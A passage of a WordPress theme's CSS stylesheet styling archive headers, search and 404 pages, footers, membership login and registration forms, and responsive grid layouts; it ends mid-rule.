.page-selected-list { position: absolute; z-index: 888; top: -9999px; right: -10px; left: -10px; display: block; cursor: auto; -webkit-transition: top 0s ease .25s, opacity .25s var(--timing), margin .25s var(--timing) .25s; transition: top 0s ease .25s, opacity .25s var(--timing), margin .25s var(--timing) .25s; pointer-events: none; opacity: 0; border-radius: var(--round-3); background: var(--solid-white); -webkit-box-shadow: 0 4px 30px var(--shadow-7); box-shadow: 0 4px 30px var(--shadow-7); } .page-selected:hover .page-selected-list { top: calc(100% - 1px); bottom: auto; visibility: visible; max-width: 1200px; margin-top: 0; -webkit-transition: top 0s ease 0s, opacity .25s var(--timing), margin .25s var(--timing) 0s; transition: top 0s ease 0s, opacity .25s var(--timing), margin .25s var(--timing) 0s; pointer-events: auto; opacity: 1; } .page-selected-nav.page-links { margin-top: 0; } .page-selected-nav.page-links .post-page-numbers { padding: 0 10px; } .page-list-item:last-child { border: none; } .page-list-item .current, .page-selected-nav .empty-link { pointer-events: none; opacity: .5; } .page-list-item > * { display: block; padding: 7px 20px; -webkit-transition: var(--effect); transition: var(--effect); border-bottom: 1px solid var(--flex-gray-15); } .page-list-item a:hover { color: var(--g-color); border-color: transparent; background-color: var(--flex-gray-7); } .medium-entry-size .rbct > * { font-size: 1.1em; } .medium-entry-size .rbct h1 { font-size: calc(var(--h1-fsize) * 1.1); } .medium-entry-size .rbct h2 { font-size: calc(var(--h2-fsize) * 1.1); } .medium-entry-size .rbct h3 { font-size: calc(var(--h3-fsize) * 1.1); } .medium-entry-size .rbct h4 { font-size: calc(var(--h4-fsize) * 1.1); } .medium-entry-size .rbct h5 { font-size: calc(var(--h5-fsize) * 1.1); } .medium-entry-size .rbct h6 { font-size: calc(var(--h6-fsize) * 1.1); } .big-entry-size .rbct > * { font-size: 1.2em; } .big-entry-size .rbct h1 { font-size: calc(var(--h1-fsize) * 1.2); } .big-entry-size .rbct h2 { font-size: calc(var(--h2-fsize) * 1.2); } .big-entry-size .rbct h3 { font-size: calc(var(--h3-fsize) * 1.2); } .big-entry-size .rbct h4 { font-size: calc(var(--h4-fsize) * 1.2); } .big-entry-size .rbct h5 { font-size: calc(var(--h5-fsize) * 1.2); } .big-entry-size .rbct h6 { font-size: calc(var(--h6-fsize) * 1.2); } .font-resizer-trigger { display: inline-flex; align-items: center; flex-flow: row nowrap; padding-right: 5px; -webkit-transition: var(--effect); transition: var(--effect); } .font-resizer-trigger:after { font-family: 'ruby-icon' !important; font-size: 9px; padding-right: 1px; content: '\e961'; } .medium-entry-size .font-resizer-trigger { -webkit-transform: scale(1.07); transform: scale(1.07); } .big-entry-size .font-resizer-trigger { -webkit-transform: scale(1.15); transform: scale(1.15); } /* ----------------- 10 - Archives ----------------- */ .archive-header { position: relative; z-index: 1; padding-top: 25px; padding-bottom: 25px; } .solid-bg { background-color: var(--flex-gray-7); } .is-pattern:before { position: absolute; z-index: 0; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; content: ''; pointer-events: none; opacity: .15; } .pattern-dot:before { background-image: radial-gradient(var(--body-fcolor) 1px, transparent 1px); background-size: 15px 15px; } .pattern-dot2:before { background-image: radial-gradient(var(--body-fcolor) 1px, transparent 1px), radial-gradient(var(--body-fcolor) 1px, var(--solid-white) 1px); background-position: 100% 0, 10px 10px; background-size: 20px 20px; } .pattern-diagonal:before { background: repeating-linear-gradient(-45deg, var(--body-fcolor), var(--body-fcolor) 7px, transparent 7px, transparent 37px); } .pattern-diagonal2:before { background-image: repeating-linear-gradient(90deg, var(--body-fcolor), var(--body-fcolor) 1px, transparent 0, transparent 50%); background-size: 24px 24px; } .is-pattern.pattern-diagonal:before, .is-pattern.pattern-diagonal2:before { opacity: .05; } .archive-inner { position: relative; z-index: 10; display: flex; align-items: center; flex-flow: row nowrap; } .archive-header-content { flex-grow: 1; } .archive-header-content .qlinks-content { flex-flow: row wrap; } .archive-header-content .qlink { padding-top: 2px; padding-bottom: 2px; } .taxonomy-description { max-width: 760px; } .taxonomy-description > *:not(:last-child) { margin-bottom: 1em; } .taxonomy-description a { -webkit-transition: var(--effect); transition: var(--effect); text-decoration: underline; } .taxonomy-description a:hover { color: var(--g-color); } .light-scheme .taxonomy-description, .light-scheme .taxonomy-description * { color: var(--absolute-light); } .category-hero-wrap { position: relative; display: flex; flex-flow: row nowrap; flex-grow: 0; width: 100%; max-width: 420px; } .archive-header .category-hero-wrap { width: 33.33%; } .category-hero-item { position: relative; z-index: 100; display: flex; width: 100%; } .category-hero-item:nth-child(2) { position: absolute; z-index: 0; top: 15px; right: 15px; filter: blur(5px); -webkit-filter: blur(5px); } .category-hero-item-inner { position: relative; display: block; overflow: hidden; width: 100%; padding-bottom: 60%; -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .category-hero-item img { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; width: 100%; height: 100%; object-fit: cover; } .archive-header-content > *:not(:last-child) { margin-bottom: 15px; } .featured-category-img-overlay { position: absolute; z-index: 0; top: 0; right: 0; bottom: 0; left: 0; display: block; width: 100%; height: 100%; } .archive-header.category-header-2 { position: relative; margin-bottom: 40px; padding-top: 50px; padding-bottom: 50px; background-color: var(--dark-accent); } .category-header-2 .archive-header-content { position: relative; z-index: 10; display: flex; align-items: center; flex-flow: column nowrap; text-align: center; } .yes-hd-transparent .archive-header.category-header-2 { padding-top: calc(50px + var(--nav-height)); } .featured-category-img-overlay img { width: 100%; height: 100%; opacity: .5; filter: blur(5px); -webkit-filter: blur(5px); object-fit: cover; } .blog-wrap { margin-top: 30px; margin-bottom: 30px; } .blog-wrap .block-h { margin-bottom: 20px; } .without-sidebar .blog-content { flex-basis: 100%; width: 100%; } .search-header { position: relative; display: block; padding-top: 25px; } .yes-hd-transparent .search-header { padding-top: calc(40px + var(--nav-height)); color: var(--absolute-white); } .search-header:before { position: absolute; top: 0; right: 0; bottom: 27px; left: 0; content: ''; pointer-events: none; background-color: var(--flex-gray-7); } .search-header-inner { position: relative; z-index: 1; } .search-header-content { display: block; margin-bottom: 25px; text-align: center; } .search-subtitle { display: block; margin-top: 10px; color: var(--meta-fcolor); } .search-header-form .search-form { max-width: 620px; margin-right: auto; margin-left: auto; border-radius: var(--round-5); background-color: var(--solid-white); -webkit-box-shadow: 0 0 40px var(--shadow-12) !important; box-shadow: 0 0 40px var(--shadow-12) !important; } .search-empty { max-width: 500px; min-height: 35vh; margin-top: 30px; margin-right: auto; margin-left: auto; text-align: center; color: var(--meta-fcolor); } .author-header-inner .breadcrumb-wrap { margin-bottom: 15px; } .bio-title { text-decoration-line: underline; text-decoration-style: dotted; text-decoration-thickness: 3px; text-decoration-color: var(--g-color); } .bio-description { font-size: var(--rem-small); display: block; max-width: 720px; margin-top: 12px; } .ubio, .ubio-inner { display: flex; align-items: center; flex-flow: row nowrap; flex-grow: 1; } .bio-content .usocials { margin-top: 12px; } .bio-avatar { position: relative; display: flex; overflow: hidden; flex-flow: column nowrap; flex-shrink: 0; width: 100px; height: 100px; margin-left: 20px; padding: 4px; border-radius: 100%; } .bio-avatar img { display: block; width: 100%; height: 100%; border-radius: 100%; } .bio-count-posts { display: flex; align-items: flex-end; flex-flow: column nowrap; justify-content: flex-end; padding-right: 20px; } .ef-label:not(:first-child):before { margin-right: 5px; margin-left: 5px; content: '/'; opacity: .5; } .bio-avatar:before { position: absolute; top: 0; right: 0; display: block; width: 100%; height: 100%; content: ''; border-top: 2px solid; border-radius: 100%; } /* ----------------- 11 - Pages ----------------- */ .single-page .s-ct { padding-bottom: 25px; } .page-header, .page-header-content { position: relative; display: block; } .page-header-content { z-index: 1; } .page-header-1 { margin-bottom: 30px; padding-top: 30px; } .page-header-1 .page-featured img { border-radius: var(--round-5); } .page-header-2 { overflow: hidden; margin-bottom: 25px; padding-top: 40px; padding-bottom: 40px; } .page-featured-overlay { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; } .page-featured-overlay img { width: 100%; height: 100%; object-fit: cover; } .page-header-2 .s-title { margin-bottom: 10px; } .page-header-content > *:last-child { margin-bottom: 0; } .page404-wrap { display: flex; align-items: center; width: 100%; min-height: 70vh; } .page404-inner { display: block; width: 100%; padding-top: 30px; padding-bottom: 30px; } .page404-featured { display: block; margin-bottom: 40px; text-align: center; } .page404-featured img { width: auto; max-height: 300px; } .page404-inner > *:not(.page404-featured) { max-width: 700px; margin-right: auto; margin-left: auto; text-align: center; } .page404-inner .page-title, .page404-inner .page404-description { margin-bottom: 20px; } .page404-description { color: var(--meta-fcolor); } .page404-inner > .search-form { max-width: 550px; margin-bottom: 20px; } .page404-btn-wrap { padding-top: 10px; } .section-empty-inner { max-width: 720px; padding: 50px 0; } .section-empty-inner .page-title { position: relative; margin-bottom: 12px; padding-bottom: 15px; } .section-empty-inner .page-title:after { position: absolute; right: 0; bottom: 0; display: block; width: 20%; max-width: 200px; height: 5px; content: ''; border-radius: var(--round-5); background-color: var(--g-color); } /* ----------------- 12 - Footer ----------------- */ .footer-copyright { position: relative; display: block; } .footer-copyright .copyright * { font-size: inherit; } .bottom-footer-section { display: flex; align-items: center; flex-flow: row nowrap; flex-basis: 100%; padding-top: 15px; padding-bottom: 15px; } .footer-bottom-centered .bottom-footer-section { flex-flow: column nowrap; } .footer-bottom-centered .footer-social-list { margin-top: 10px; margin-right: auto; margin-left: auto; } .footer-bottom-centered .footer-social-list-title { display: none; } .footer-bottom-centered .footer-social-list > * { margin-right: 0; padding: 0 7px; } .footer-col .w-widget { margin-bottom: 40px; } .footer-logo { display: flex; flex-grow: 0; flex-shrink: 0; height: var(--flogo-height, 50px); } .footer-logo img { width: auto; max-height: 100%; object-fit: contain; } .footer-social-list { display: flex; align-items: center; flex-flow: row nowrap; margin-right: auto; } .footer-social-list-title { line-height: 1; padding-left: 12px; border-left: 1px solid var(--flex-gray-15); } .footer-social-list > * { margin-right: 12px; } .copyright-inner { font-size: var(--meta-fsize); display: flex; flex-flow: row nowrap; padding: 15px 0; border-top: 1px solid var(--flex-gray-15); } .footer-etemplate .copyright-inner { border-top: none; } .copyright-inner > *:last-child:is(.copyright) { margin-right: auto; margin-left: auto; } .copyright { opacity: .7; } .copyright-menu { display: flex; flex-flow: row nowrap; flex-grow: 0; margin-right: auto; } .copyright-menu > li { line-height: 1; position: relative; display: flex; align-items: center; } .copyright-menu > li:before { position: relative; display: flex; width: 4px; height: 4px; margin-right: 10px; margin-left: 10px; content: ''; opacity: .2; background: currentColor; } .copyright-menu > li:first-child:before { display: none; } .w-sidebar { margin-bottom: 50px; } .w-sidebar .widget-heading, .elementor-widget-container > h5 { margin-bottom: 20px; } .footer-wrap { position: relative; display: block; overflow: hidden; } .footer-wrap:not(.footer-etemplate) > *:first-child:not(.footer-copyright) { padding-top: 50px; } .footer-wrap.left-dot:after { position: absolute; z-index: 0; top: 0; right: 0; display: block; width: 20%; height: 50%; content: ''; opacity: .2; background-image: radial-gradient(var(--body-fcolor) .75px, transparent .75px); background-size: 16px 16px; } [data-theme='dark'] .footer-wrap.left-dot:after { opacity: .12; } footer.top-border { border-top: 1px solid var(--flex-gray-15); } [data-theme='dark'] .footer-etemplate .elementor-shape-fill, [data-theme='dark'] .header-template .elementor-shape-fill { fill: var(--solid-white); } .footer-wrap .widget-heading.heading-layout-10, .footer-wrap .widget-heading.heading-layout-c10, .more-col .widget-heading { opacity: .7; } .footer-col .w-sidebar { margin-bottom: 30px } .footer-col .widget_nav_menu a span { font-size: var(--em-mini); } .footer-columns { position: relative; z-index: 2; } .footer-columns .footer-col { flex-basis: 50%; width: 50%; } .footer-columns .footer-col:first-child, .footer-4c .footer-col:last-child, .footer-3c .footer-col { flex-basis: 100%; width: 100%; } .footer-col .widget:not(.widget-mc) .mc4wp-form-fields input[type='submit'] { padding-right: 15px; padding-left: 15px; } .footer-quote:first-letter { font-size: 1.2em; margin-left: 1px; padding: 0 3px; color: var(--absolute-white); background-color: var(--g-color); } .site-access-inner { display: flex; flex-flow: column nowrap; width: auto; max-width: 600px; padding: 50px; text-align: center; border-radius: var(--round-5); background-color: #d60a3a; box-shadow: 0 5px 30px var(--shadow-12); } .site-access-inner > *:not(:last-child) { margin-bottom: 20px; } .site-access-popup { display: flex; align-items: center; justify-content: center; } .site-access-image svg { width: 100px; } .site-access-btn .is-btn { font-size: 1rem; display: inline-flex; color: var(--dark-accent); background-color: #fff; } .site-access-btn .is-btn:hover { color: #fff; background-color: var(--dark-accent); } .site-access-description { font-size: 1.2rem; } .elementor-widget-text-editor a.h6, .elementor-widget-html a.h6 { text-decoration: underline; text-decoration-color: var(--g-color); } /** membership */ .restrict-box { position: relative; display: block; margin-bottom: 40px; } .restrict-box-inner { position: relative; z-index: 1; display: block; max-width: 560px; margin-right: auto; margin-left: auto; padding: 40px; text-align: center; border-radius: var(--round-5); box-shadow: 0 5px 30px var(--shadow-7); } .restrict-box-inner > *:not(:last-child) { display: block; margin-bottom: 12px; } .restrict-title span, .restrict-desc span, .plan-title span { color: var(--g-color); } .restrict-button-wrap a { font-size: 1.2rem; display: inline-block; padding-top: 10px; padding-bottom: 10px; } .restrict-button-wrap { padding-top: 5px; padding-bottom: 5px; } .restrict-login-link { margin-right: 4px; } #swpm-login-form, #swpm-pw-reset-form, .swpm-registration-widget-form, #swpm-editprofile-form { display: block; max-width: 360px; margin-right: auto; margin-left: auto; padding: 30px 20px; border-radius: var(--round-5); box-shadow: 0 5px 30px var(--shadow-7); } .swpm-login-widget-logged { display: flex; flex-flow: row wrap; max-width: 600px; margin-right: auto; margin-left: auto; padding: 30px 20px; border-radius: var(--round-5); box-shadow: 0 5px 30px var(--shadow-7); } #swpm-editprofile-form, .swpm-registration-widget-form { max-width: 460px; } .swpm-label, .swpm_label, .swpm-registration-widget-form label, #swpm-editprofile-form label { font-size: var(--rem-mini); display: block; margin-bottom: 4px; text-align: right; } .swpm-remember-me { font-size: var(--rem-mini); } input.swpm-text-field { display: block; width: 100%; } .swpm-username-input, .swpm-password-input { margin-bottom: 15px; } .rbct input[type='password'].swpm-text-field { margin-right: 0; } .swpm-login-submit, .swpm-pw-reset-submit-button { margin-top: 20px; margin-bottom: 20px; text-align: center; } input.swpm-login-form-submit { font-size: 1rem; } input[type='submit'].swpm-login-form-submit, input[type='submit'].swpm-pw-reset-submit, input[type='submit'].swpm-registration-submit, input[type='submit'].swpm-edit-profile-submit { font-size: 1rem; padding-right: 40px; padding-left: 40px; } .swpm-registration-submit, .swpm-edit-profile-submit, .swpm-pw-reset-submit { width: 100%; } .swpm-forgot-pass-link, .swpm-join-us-link { display: block; margin-top: 15px; text-align: center; } .swpm-rember-label { color: var(--meta-fcolor); } .swpm-forgot-pass-link #forgot_pass { font-family: var(--meta-family); font-size: var(--meta-fsize); font-weight: var(--meta-fweight); text-decoration: none; opacity: .7; } a.swpm-login-form-register-link { font-size: var(--rem-mini); padding: 5px 12px; text-decoration: none !important; opacity: .7; border: 1px solid; border-radius: var(--round-3); } .swpm-login-form-register-link:hover, .swpm-forgot-pass-link #forgot_pass:hover { opacity: 1; } .swpm-login-action-msg { font-size: var(--rem-small); margin-top: 20px; text-align: center; border-radius: var(--round-5); background: #eeb3541c; } .swpm-registration-widget-form tr, #swpm-editprofile-form tr { display: flex; flex-flow: column nowrap; width: 100%; background: none !important; } #swpm-editprofile-form tbody { display: flex; flex-flow: row wrap; background: none !important; } .swpm-registration-widget-form tr.swpm-registration-membership-level-row, #swpm-editprofile-form .swpm-profile-username-row, #swpm-editprofile-form .swpm-profile-membership-level-row { align-items: center; flex-flow: row nowrap; justify-content: space-between; margin: 5px 0 20px; } .swpm-profile-username-row label, .swpm-registration-membership-level-row label, .swpm-profile-membership-level-row label { margin-bottom: 0; } .swpm-registration-membership-level-row, #swpm-editprofile-form .swpm-profile-membership-level-row, .hide-rego-form-msg { line-height: 1; padding: 15px; border: 1px solid var(--flex-gray-15); border-radius: var(--round-5); } .swpm-profile-username-row td:last-child, .swpm-registration-membership-level-row td:last-child, .swpm-profile-membership-level-row td:last-child { font-size: 1rem; font-weight: 700; text-align: left; text-transform: uppercase; } .swpm-registration-widget-form table, .swpm-registration-widget-form td, #swpm-editprofile-form table, #swpm-editprofile-form td { padding: 0; border: none; } .swpm-registration-widget-form input[type='text'], .swpm-registration-widget-form input[type='password'], #swpm-editprofile-form input[type='text'], #swpm-editprofile-form input[type='password'], .swpm-edit-profile-form select { font-weight: 700; width: 100%; margin: 0; margin-bottom: 15px; } .swpm_error, .swpm_success { font-size: var(--rem-small); display: block; padding: 15px 20px; text-align: center; border-radius: var(--round-5); background-color: #fba0a029; } .swpm_success { background-color: #65b97329; } .swpm_error ul { margin-top: 10px; } #swpm-editprofile-form table { margin-bottom: 0; } .hide-rego-form-msg { font-size: var(--rem-mini); } .swpm-login-widget-logged > *:not(.swpm-edit-profile-link):not(.swpm-logged-logout-link) { display: flex; flex-flow: row nowrap; justify-content: space-between; width: 100%; padding: 5px 0; border-bottom: 1px solid var(--flex-gray-15); } .swpm-login-widget-logged .swpm-edit-profile-link, .swpm-login-widget-logged .swpm-logged-logout-link { display: flex; flex: 0 0 50%; width: 50%; margin-top: 30px; padding-right: 10px; padding-left: 10px; } .swpm-login-widget-logged a { display: inline-block; flex-grow: 1; text-align: center; text-decoration: none !important; } .swpm-edit-profile-link a, .swpm-logged-logout-link a { font-family: var(--btn-family); font-weight: var(--btn-fweight); font-style: var(--btn-fstyle); display: inline-block; flex-grow: 1; padding-top: 7px; padding-bottom: 7px; text-align: center; text-decoration: none !important; letter-spacing: var(--btn-fspace); text-transform: var(--btn-transform); border-radius: var(--round-5); } .swpm-edit-profile-link a { border: 1px solid; } .swpm-logged-logout-link a { color: var(--absolute-white) !important; background-color: var(--g-color); } .swpm-logged-logout-link a:hover { -webkit-box-shadow: 0 4px 15px var(--g-color-90); box-shadow: 0 4px 15px var(--g-color-90); } /* ----------------- 13 - Responsive ----------------- */ @media (min-width: 768px) { .rb-col-2 > .block-inner > * { flex-basis: 50%; width: 50%; } .rb-col-3 > .block-inner > * { flex-basis: 33.33%; width: 33.33%; } .rb-col-4 > .block-inner > * { flex-basis: 25%; width: 25%; } .rb-col-5 > .block-inner > * { flex-basis: 20%; width: 20%; } .rb-col-6 > .block-inner > * { flex-basis: 16.66%; width: 16.66%; } .rb-col-7 > .block-inner > * { flex-basis: 14.25%; width: 14.25%; } .col-border .block-inner > *:after { position: absolute; top: 0; right: auto; bottom: 0; left: 0; width: 1px; height: 100%; content: ''; pointer-events: none; border-left: 1px var(--column-border-style, solid) var(--column-border-color); } .overlay-inner, .overlay-inner .counter-el { padding: 25px 20px; } .p-highlight .p-gradient { padding: 100px 25px 25px 25px; background: linear-gradient(to top, var(--dark-accent) 0, var(--dark-accent-90) calc(100% - 150px), var(--dark-accent-0) 100%); } .p-highlight.p-vtop .p-gradient { padding: 25px 25px 100px 25px; background: linear-gradient(to bottom, var(--dark-accent) 0, var(--dark-accent-90) calc(100% - 150px), var(--dark-accent-0) 100%); } .related-sec.related-1, .related-sec.related-2, .related-sec.related-3, .related-sec.related-4 { float: left; max-width: 350px; margin-right: 1.5rem; padding: 25px; } .related-sec.related-5, .related-sec.related-6 { padding: 30px; } .scroll-holder { overflow-x: hidden; overflow-y: auto; } .list-holder { flex-flow: row-reverse nowrap; } .featured-left .list-holder { flex-flow: row nowrap; } .list-feat-holder { flex-shrink: 0; width: 45%; max-width: 45%; } .p-list-1 .list-feat-holder { width: 40%; max-width: 40%; } .cbox-3 .cbox-featured-overlay { padding-bottom: 125%; } .ecat-bg-1.p-list-1 .feat-holder .p-top, .ecat-big-bg-1.p-list-1 .feat-holder .p-top, .ecat-bg-2.p-list-1 .feat-holder .p-top, .ecat-big-bg-2.p-list-1 .feat-holder .p-top { right: -5px; bottom: 5px; } .list-box .p-featured { -webkit-border-top-right-radius: 0; border-top-right-radius: 0; -webkit-border-bottom-right-radius: 0; border-bottom-right-radius: 0; } .featured-left .list-box .p-featured { border-radius: 0 var(--wrap-border, var(--round-3)) var(--wrap-border, var(--round-3)) 0; -webkit-border-top-left-radius: 0; -webkit-border-top-right-radius: var(--wrap-border, var(--round-3)); -webkit-border-bottom-right-radius: var(--wrap-border, var(--round-3)); -webkit-border-bottom-left-radius: 0; } .list-box .list-holder { align-items: stretch; } .p-middle .list-box .list-holder { align-items: center; } .list-box .feat-holder, .list-box .p-featured { height: 100%; } .list-box .p-content { margin-top: var(--box-spacing); margin-right: var(--box-spacing); margin-bottom: var(--box-spacing); } .p-center .list-box .p-content { margin-right: var(--list-holder-spacing, 15px); } .featured-left .list-box .p-content { margin-right: 0; margin-left: var(--box-spacing); } .smeta-in .is-meta > *, .smeta-in .meta-text > *, .review-section .meta-text > *, .spon-qview .sponsor-label, .spon-qview .is-text, .nname-info .nice-name { font-size: 1.15em; } .review-header .rstar i { font-size: 18px; } .comment-form .comment-form-author, .comment-form .comment-form-email, .comment-form .comment-form-url { float: right; width: 33.33%; } .s-ct { padding-bottom: 15px; } .single-page .s-ct { min-height: 45vh; padding-bottom: 40px; } .single-page.none-header .s-ct { min-height: 60vh; margin-top: 50px; } .sfoter-sec { margin-bottom: 50px; } .single-related { padding-top: 40px; } .sidebar-inner .widget { margin-bottom: 40px; } .rbtoc.table-left:not(.table-fw-single-col) { float: right; min-width: 340px; max-width: 50%; margin-bottom: 30px; margin-left: 30px; padding: 25px; } .rbtoc.table-fw { padding: 25px; } .rbtoc.table-fw .inner { display: flex; flex-flow: row wrap; margin-right: -15px; margin-left: -15px; } .rbtoc.table-fw .inner a { flex: 0 0 50%; max-width: 50%; margin: 0; padding: 7px 15px; border: none; } .rbtoc.table-fw .inner a:not(:nth-last-child(1)):not(:nth-last-child(2)):after { position: absolute; right: 15px; bottom: 0; left: 15px; display: block; height: 1px; content: ''; background-color: var(--flex-gray-15); } .grid-masonry .grid-holder { display: grid; grid-template-columns: auto auto auto auto auto auto auto auto; grid-gap: 8px; } .grid-fmasonry .grid-holder { display: grid; grid-template-columns: auto auto auto auto auto auto auto auto auto auto; grid-gap: 10px; } .grid-default .grid-holder.rb-c5 { display: grid; grid-template-columns: auto auto auto auto auto; grid-gap: 10px; } .grid-default .grid-holder.rb-c6 { display: grid; grid-template-columns: auto auto auto auto auto auto; grid-gap: 10px; } .grid-default .grid-holder.rb-c7 { display: grid; grid-template-columns: auto auto auto auto auto auto auto; grid-gap: 10px; } .grid-default .grid-holder.rb-c8 { display: grid; grid-template-columns: auto auto auto auto auto auto auto auto; grid-gap: 10px; } .grid-default .grid-holder.rb-c9 { display: grid; grid-template-columns: auto auto auto auto auto auto auto auto auto; grid-gap: 10px; } .top-footer-inner > *:not(:last-child) { margin-bottom: 50px; } .grid-masonry .grid-el:nth-child(2) { grid-column: 1 / span 2; grid-row: 1 / span 2; } .grid-masonry .grid-el:first-child { height: 100%; grid-column: 3 / span 2; grid-row: 1; } .grid-masonry .grid-el:nth-child(3) { grid-column: 5 / span 2; grid-row: 1 / span 2; } .grid-masonry .grid-el:nth-child(4) { grid-column: 7 / span 1; grid-row: 1; } .grid-masonry .grid-el:nth-child(5) { grid-column: 8 / span 1; grid-row: 1; } .grid-masonry .grid-el:nth-child(6) { grid-column: 3 / span 1; grid-row: 2; } .grid-masonry .grid-el:nth-child(7) { grid-column: 4 / span 1; grid-row: 2; } .grid-masonry .grid-el:nth-child(8) { grid-column: 7 / span 2; grid-row: 2; } .grid-fmasonry .grid-el:nth-child(2) { grid-column: 1; grid-row: 2; } .grid-fmasonry .grid-el:nth-child(3) { grid-column: 2 / span 2; grid-row: 1 / span 2; } .grid-fmasonry .grid-el:nth-child(4) { grid-column: 4 / span 2; grid-row: 1; } .grid-fmasonry .grid-el:nth-child(5) { grid-column: 6 / span 2; grid-row: 1 / span 2; } .grid-fmasonry .grid-el:nth-child(11) { grid-column: 8 / span 2; grid-row: 2; } .grid-masonry .grid-el:first-child .instagram-box, .grid-masonry .grid-el:nth-child(8) .instagram-box, .grid-masonry .grid-el:nth-child(9) .instagram-box, .grid-fmasonry .grid-el:nth-child(4) .instagram-box, .grid-fmasonry .grid-el:nth-child(11) .instagram-box { padding-bottom: 50%; } .is-style-1 .fnicon i, .is-style-2 .fnicon i, .is-style-9 .fnicon i { width: 66px; height: 66px; } .p-middle.p-highlight .p-gradient, .p-middle.p-overlay .p-gradient { padding-top: 0; padding-bottom: 0; background: none; } } @media (min-width: 768px) and (max-width: 1024px) { .rb-tcol-1 > .block-inner > * { flex-basis: 100%; width: 100%; } .rb-tcol-2 > .block-inner > * { flex-basis: 50%; width: 50%; } .rb-tcol-3 > .block-inner > * { flex-basis: 33.33%; width: 33.33%; } .rb-tcol-4 > .block-inner > * { flex-basis: 25%; width: 25%; } .rb-tcol-5 > .block-inner > * { flex-basis: 20%; width: 20%; } .rb-tcol-6 > .block-inner > * { flex-basis: 16.66%; width: 16.66%; } .rb-tcol-2 .block-inner > *:nth-last-child(1), .rb-tcol-2 .block-inner > *:nth-last-child(2), .rb-tcol-3 .block-inner > *:nth-last-child(1), .rb-tcol-3 .block-inner > *:nth-last-child(2), .rb-tcol-3 .block-inner > *:nth-last-child(3), .rb-tcol-4 .block-inner > *:nth-last-child(1), .rb-tcol-4 .block-inner > *:nth-last-child(2), .rb-tcol-4 .block-inner > *:nth-last-child(3), .rb-tcol-4 .block-inner > *:nth-last-child(4), .rb-tcol-5 .block-inner > *:nth-last-child(1), .rb-tcol-5 .block-inner > *:nth-last-child(2), .rb-tcol-5 .block-inner > *:nth-last-child(3), .rb-tcol-5 .block-inner > *:nth-last-child(4), .rb-tcol-5 .block-inner > *:nth-last-child(5), .rb-tcol-6 .block-inner > *:nth-last-child(1), .rb-tcol-6 .block-inner > *:nth-last-child(2), .rb-tcol-6 .block-inner > *:nth-last-child(3), .rb-tcol-6 .block-inner > *:nth-last-child(4), .rb-tcol-6 .block-inner > *:nth-last-child(5), .rb-tcol-6 .block-inner > *:nth-last-child(6) { margin-bottom: 0; } .rb-tcol-2.no-last-bb .block-inner > *:nth-last-child(1), .rb-tcol-2.no-last-bb .block-inner > *:nth-last-child(2), .rb-tcol-3.no-last-bb .block-inner > *:nth-last-child(1), .rb-tcol-3.no-last-bb .block-inner > *:nth-last-child(2), .rb-tcol-3.no-last-bb .block-inner > *:nth-last-child(3), .rb-tcol-4.no-last-bb .block-inner > *:nth-last-child(1), .rb-tcol-4.no-last-bb .block-inner > *:nth-last-child(2), .rb-tcol-4.no-last-bb .block-inner > *:nth-last-child(3), .rb-tcol-4.no-last-bb .block-inner > *:nth-last-child(4), .rb-tcol-5.no-last-bb .block-inner > *:nth-last-child(1), .rb-tcol-5.no-last-bb .block-inner > *:nth-last-child(2), .rb-tcol-5.no-last-bb .block-inner > *:nth-last-child(3), .rb-tcol-5.no-last-bb .block-inner > *:nth-last-child(4), .rb-tcol-5.no-last-bb .block-inner > *:nth-last-child(5), .rb-tcol-6.no-last-bb .block-inner > *:nth-last-child(1), .rb-tcol-6.no-last-bb .block-inner > *:nth-last-child(2), .rb-tcol-6.no-last-bb .block-inner > *:nth-last-child(3), .rb-tcol-6.no-last-bb .block-inner > *:nth-last-child(4), .rb-tcol-6.no-last-bb .block-inner > *:nth-last-child(5), .rb-tcol-6.no-last-bb .block-inner > *:nth-last-child(6) { padding-bottom: 0; --bottom-border-color: transparent; } .col-border.rb-tcol-1 > .block-inner > *:after, .col-border.rb-tcol-2 > .block-inner > *:nth-child(2n):after, .col-border.rb-tcol-3 > .block-inner > *:nth-child(3n):after, .col-border.rb-tcol-4 > .block-inner > *:nth-child(4n):after, .col-border.rb-tcol-5 > .block-inner > *:nth-child(5n):after, .col-border.rb-tcol-6 > .block-inner > *:nth-child(6n):after, .col-border.rb-tcol-7 > .block-inner > *:nth-child(7n):after { border-left: none; } .is-sidebar { max-width: 420px; margin-right: auto; margin-left: auto; } body .tablet-hide, body .tablet-hide + .spacing { display: none; } .meta-el:not(.tablet-hide) + .meta-el:not(.tablet-hide):before { display: inline-flex; width: 3px; height: 3px; margin-right: .6em; margin-left: .6em; content: ''; opacity: .5; border-radius: 100%; background-color: currentColor; } } @media (min-width: 992px) { .grid-container { flex-flow: row nowrap; } .grid-container > *:nth-child(1) { flex: 0 0 66.67%; width: 66.67%; } .grid-container > *:nth-child(2) { flex: 0 0 33.33%; width: 33.33%; } .is-sidebar-left .grid-container { flex-direction: row-reverse; } .without-sidebar .grid-container > * { flex: 0 0 100%; width: 100%; } .single-time-read > *, .t-shared-header span { font-size: 1.15em; } body .s-cats.custom-size .p-category { font-size: var(--single-category-fsize); } } /** desktop */ @media (min-width: 1025px) { .col-border.rb-col-1 > .block-inner > *:after, .col-border.rb-col-2 > .block-inner > *:nth-child(2n):after, .col-border.rb-col-3 > .block-inner > *:nth-child(3n):after, .col-border.rb-col-4 > .block-inner > *:nth-child(4n):after, .col-border.rb-col-5 > .block-inner > *:nth-child(5n):after, .col-border.rb-col-6 > .block-inner > *:nth-child(6n):after, .col-border.rb-col-7 > .block-inner > *:nth-child(7n):after { border-left: none; } .header-transparent { position: absolute; z-index: 100; top: 0; right: 0; width: 100%; } body:not(.sticky-on) .header-transparent .main-menu > li > a, body:not(.sticky-on) .header-transparent .main-menu > li > a .menu-sub-title, body:not(.sticky-on) .header-transparent .more-trigger, body:not(.sticky-on) .header-transparent .navbar-right > *, body:not(.sticky-on) .header-transparent .is-text-logo .logo-title > *, html:not(.collapse-activated) body:not(.sticky-on) .header-transparent .header-mobile-wrap .is-text-logo .logo-title > *, html:not(.collapse-activated) body:not(.sticky-on) .header-transparent .header-mobile-wrap .navbar-right > * { color: var(--transparent-nav-color, var(--nav-color)); } body:not(.sticky-on) .header-transparent .dark-mode-toggle-wrap:not(:first-child) .dark-mode-toggle { border-color: #ffffff20; } .header-transparent 